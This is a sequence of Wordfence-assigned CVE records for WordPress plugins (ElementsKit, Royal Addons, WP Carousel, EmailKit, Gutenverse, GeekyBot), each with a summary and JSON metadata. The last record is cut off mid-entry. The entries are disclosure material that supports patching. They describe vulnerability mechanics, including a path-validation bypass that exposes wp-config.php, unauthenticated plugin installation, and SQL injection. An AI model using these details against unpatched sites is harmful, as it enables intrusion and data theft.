
CVE-2026-4362 (GCVE-0-2026-4362)

Vulnerability from cvelistv5 – Published: 2026-05-05 04:27 – Updated: 2026-05-05 04:27
Title
ElementsKit Elementor Addons <= 3.8.2 - Missing Authorization to Unauthenticated Widget Content Overwrite
Summary
The ElementsKit Elementor Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `Live_Action::reset()` function in all versions up to, and including, 3.8.2. The function is hooked to the WordPress `init` action and triggers when both `post` and `action=elementor` GET parameters are present, with no authentication or nonce verification. This makes it possible for unauthenticated attackers to overwrite the Elementor content (`_elementor_data`) of any `elementskit_widget` custom post type by visiting a specially crafted URL. The widget's custom designs, text, and configurations are permanently replaced with a blank template.
CWE
  • CWE-862 - Missing Authorization
Assigner
Credits
Jack Pas

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "ElementsKit Elementor Addons \u2013 Advanced Widgets \u0026 Templates Addons for Elementor",
          "vendor": "roxnor",
          "versions": [
            {
              "lessThanOrEqual": "3.8.2",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Jack Pas"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The ElementsKit Elementor Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `Live_Action::reset()` function in all versions up to, and including, 3.8.2 The function is hooked to the WordPress `init` action and triggers when both `post` and `action=elementor` GET parameters are present, with no authentication or nonce verification. This makes it possible for unauthenticated attackers to overwrite the Elementor content (`_elementor_data`) of any `elementskit_widget` custom post type by visiting a specially crafted URL. The widget\u0027s custom designs, text, and configurations are permanently replaced with a blank template."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862 Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T04:27:56.288Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7740fdfb-65b2-4d27-935f-b0e73487f0c4?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L27"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L10"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/init.php#L37"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3499543/elementskit-lite/trunk/modules/widget-builder/live-action.php"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Felementskit-lite/tags/3.8.2\u0026new_path=%2Felementskit-lite/tags/3.9.0"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-17T20:33:02.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T16:06:48.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "ElementsKit Elementor Addons \u003c= 3.8.2 - Missing Authorization to Unauthenticated Widget Content Overwrite"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-4362",
    "datePublished": "2026-05-05T04:27:56.288Z",
    "dateReserved": "2026-03-17T20:15:55.299Z",
    "dateUpdated": "2026-05-05T04:27:56.288Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-5159 (GCVE-0-2026-5159)

Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
Title
Royal Addons for Elementor <= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Follow Button Text' Parameter
Summary
The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Credits
Justin Nam

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Royal Addons for Elementor \u2013 Addons and Templates Kit for Elementor",
          "vendor": "wproyal",
          "versions": [
            {
              "lessThanOrEqual": "1.7.1056",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Justin Nam"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget\u0027s \u0027instagram_follow_text\u0027 setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T03:37:39.544Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ee96d8c5-baf0-4c5c-9ace-e88bbb95ee0a?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3514368%40royal-elementor-addons%2Ftrunk\u0026old=3503219%40royal-elementor-addons%2Ftrunk\u0026sfp_email=\u0026sfph_mail="
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-30T14:26:21.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T14:53:29.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Royal Addons for Elementor \u003c= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027Follow Button Text\u0027 Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5159",
    "datePublished": "2026-05-05T03:37:39.544Z",
    "dateReserved": "2026-03-30T14:12:40.826Z",
    "dateUpdated": "2026-05-05T03:37:39.544Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-4665 (GCVE-0-2026-4665)

Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
Title
WP Carousel Free <= 2.7.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'data-caption' Attribute
Summary
The WP Carousel Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via crafted fancybox `data-caption` attributes in all versions up to, and including, 2.7.10. This is due to the `fancybox-config.js` script reading the carousel container's `id` attribute directly from the DOM to construct a jQuery selector without sanitization. When a Contributor crafts an HTML block with a malformed carousel container ID (containing characters invalid for jQuery selectors), the custom fancybox configuration throws a JavaScript error and fails to initialize. This causes the bundled fancybox library (v3.5.7) to fall back to its default caption handling, which renders the `data-caption` attribute content as raw HTML. Since WordPress allows `data-*` attributes through `wp_kses_post()`, this makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks an image in the crafted carousel lightbox.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Credits
Craig Smith

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Carousel, Slider, Photo Gallery with Lightbox, Video Slider, by WP Carousel",
          "vendor": "shapedplugin",
          "versions": [
            {
              "lessThanOrEqual": "2.7.10",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Craig Smith"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The WP Carousel Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via crafted fancybox `data-caption` attributes in all versions up to, and including, 2.7.10. This is due to the `fancybox-config.js` script reading the carousel container\u0027s `id` attribute directly from the DOM to construct a jQuery selector without sanitization. When a Contributor crafts an HTML block with a malformed carousel container ID (containing characters invalid for jQuery selectors), the custom fancybox configuration throws a JavaScript error and fails to initialize. This causes the bundled fancybox library (v3.5.7) to fall back to its default caption handling, which renders the `data-caption` attribute content as raw HTML. Since WordPress allows `data-*` attributes through `wp_kses_post()`, this makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks an image in the crafted carousel lightbox."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T03:37:39.054Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e75815a3-2414-47f3-b0c4-e5d3e2cb369d?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/wp-carousel-free/tags/2.7.10/public/js/fancybox-config.js#L3"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/wp-carousel-free/trunk/public/js/fancybox-config.js#L3"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3506878/wp-carousel-free/trunk/public/js/fancybox.js"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-25T10:41:25.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T15:01:27.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "WP Carousel Free \u003c= 2.7.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027data-caption\u0027 Attribute"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-4665",
    "datePublished": "2026-05-05T03:37:39.054Z",
    "dateReserved": "2026-03-23T17:12:42.424Z",
    "dateUpdated": "2026-05-05T03:37:39.054Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-4803 (GCVE-0-2026-4803)

Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
Title
Royal Addons for Elementor <= 1.7.1056 - Unauthenticated Stored Cross-Site Scripting via 'status' Parameter in wpr_update_form_action_meta
Summary
The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'status' parameter in the wpr_update_form_action_meta AJAX action in all versions up to, and including, 1.7.1056. This is due to insufficient input sanitization and output escaping, combined with a publicly leaked nonce that allows unauthenticated access to the AJAX handler. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Credits
andrea bocchetti

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Royal Addons for Elementor \u2013 Addons and Templates Kit for Elementor",
          "vendor": "wproyal",
          "versions": [
            {
              "lessThanOrEqual": "1.7.1056",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "andrea bocchetti"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027status\u0027 parameter in the wpr_update_form_action_meta AJAX action in all versions up to, and including, 1.7.1056. This is due to insufficient input sanitization and output escaping, combined with a publicly leaked nonce that allows unauthenticated access to the AJAX handler. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T03:37:38.588Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c91a14d3-bc41-4490-888c-486ad2994095?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L73"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/plugin.php#L613"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L21"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-submissions-cpt.php#L23"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3503219/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-25T11:28:37.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T14:32:14.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Royal Addons for Elementor \u003c= 1.7.1056 - Unauthenticated Stored Cross-Site Scripting via \u0027status\u0027 Parameter in wpr_update_form_action_meta"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-4803",
    "datePublished": "2026-05-05T03:37:38.588Z",
    "dateReserved": "2026-03-25T11:13:17.868Z",
    "dateUpdated": "2026-05-05T03:37:38.588Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-5957 (GCVE-0-2026-5957)

Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
Title
EmailKit <= 1.6.5 - Authenticated (Author+) Arbitrary File Read via 'emailkit-editor-template' REST Parameter
Summary
The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to and including 1.6.5. This is due to a flawed path traversal validation in the create_template() method of the CheckForm class, where realpath() is called on the allowed base directory (wp-content/uploads/emailkit/templates/) which may not exist, causing it to return false. In PHP 8.x, strpos($real_path, false) implicitly converts false to an empty string, and strpos() with an empty needle always returns 0, causing the check strpos(...) !== 0 to evaluate to false and bypassing the path validation entirely. This makes it possible for authenticated attackers, with Author-level access and above, to read arbitrary files from the server, including sensitive files such as wp-config.php, by supplying an absolute path to the emailkit-editor-template REST API parameter.
CWE
  • CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
Credits
Nguyen Cong Quang

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "EmailKit \u2013 Email Customizer for WooCommerce \u0026 WP",
          "vendor": "roxnor",
          "versions": [
            {
              "lessThanOrEqual": "1.6.5",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Nguyen Cong Quang"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to and including 1.6.5. This is due to a flawed path traversal validation in the create_template() method of the CheckForm class, where realpath() is called on the allowed base directory (wp-content/uploads/emailkit/templates/) which may not exist, causing it to return false. In PHP 8.x, strpos($real_path, false) implicitly converts false to an empty string, and strpos() with an empty needle always returns 0, causing the check strpos(...) !== 0 to evaluate to false and bypassing the path validation entirely. This makes it possible for authenticated attackers, with Author-level access and above, to read arbitrary files from the server, including sensitive files such as wp-config.php, by supplying an absolute path to the emailkit-editor-template REST API parameter."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T03:37:38.237Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae58e5b0-b587-4503-8519-c5a50245891a?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L166"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L170"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/EmailSettings/MetformEmailSettings.php#L252"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L170"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L163"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L163"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L166"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailSettings/MetformEmailSettings.php#L252"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3511701%40emailkit%2Ftrunk\u0026old=3496714%40emailkit%2Ftrunk\u0026sfp_email=\u0026sfph_mail="
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-04-09T09:20:21.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T14:47:21.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "EmailKit \u003c= 1.6.5 - Authenticated (Author+) Arbitrary File Read via \u0027emailkit-editor-template\u0027 REST Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5957",
    "datePublished": "2026-05-05T03:37:38.237Z",
    "dateReserved": "2026-04-09T09:01:29.056Z",
    "dateUpdated": "2026-05-05T03:37:38.237Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-2948 (GCVE-0-2026-2948)

Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
Title
Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem <= 3.5.3 - Authenticated (Contributor+) Server-Side Request Forgery via 'imageUrl'
Summary
The Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.5.3 via the import_images() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
CWE
  • CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
Credits
Osvaldo Noe Gonzalez Del Rio

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem",
          "vendor": "jegstudio",
          "versions": [
            {
              "lessThanOrEqual": "3.5.3",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Osvaldo Noe Gonzalez Del Rio"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.5.3 via the import_images() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T03:37:37.872Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac909a4b-d949-42eb-871a-963bc6242c12?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3507804/gutenverse"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-02-21T19:13:28.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T14:51:49.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem \u003c= 3.5.3 - Authenticated (Contributor+) Server-Side Request Forgery via \u0027imageUrl\u0027"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-2948",
    "datePublished": "2026-05-05T03:37:37.872Z",
    "dateReserved": "2026-02-21T18:56:55.447Z",
    "dateUpdated": "2026-05-05T03:37:37.872Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-5294 (GCVE-0-2026-5294)

Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
Title
GeekyBot <= 1.2.2 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation via 'geekybot_frontendajax' AJAX Action
Summary
The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution.
CWE
  • CWE-862 - Missing Authorization
Assigner
Credits
Di Nhau

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "GeekyBot \u2014 AI Copilot, Chatbot, WooCommerce Lead Gen \u0026 Zero-Prompt Content",
          "vendor": "ahmadgb",
          "versions": [
            {
              "lessThanOrEqual": "1.2.2",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Di Nhau"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862 Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T03:37:37.441Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1817c58-e807-4ef2-a382-28ca2fd5239e?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3497169/geeky-bot"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-31T23:12:10.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T15:26:29.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "GeekyBot \u003c= 1.2.2 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation via \u0027geekybot_frontendajax\u0027 AJAX Action"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5294",
    "datePublished": "2026-05-05T03:37:37.441Z",
    "dateReserved": "2026-03-31T22:56:16.553Z",
    "dateUpdated": "2026-05-05T03:37:37.441Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-3456 (GCVE-0-2026-3456)

Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
Title
GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation <= 1.2.0 - Unauthenticated SQL Injection via 'attributekey'
Summary
The GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CWE
  • CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
Wordfence
Credits
Nguyen Ngoc Duc

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "GeekyBot \u2014 AI Copilot, Chatbot, WooCommerce Lead Gen \u0026 Zero-Prompt Content",
          "vendor": "ahmadgb",
          "versions": [
            {
              "lessThanOrEqual": "1.2.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Nguyen Ngoc Duc"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
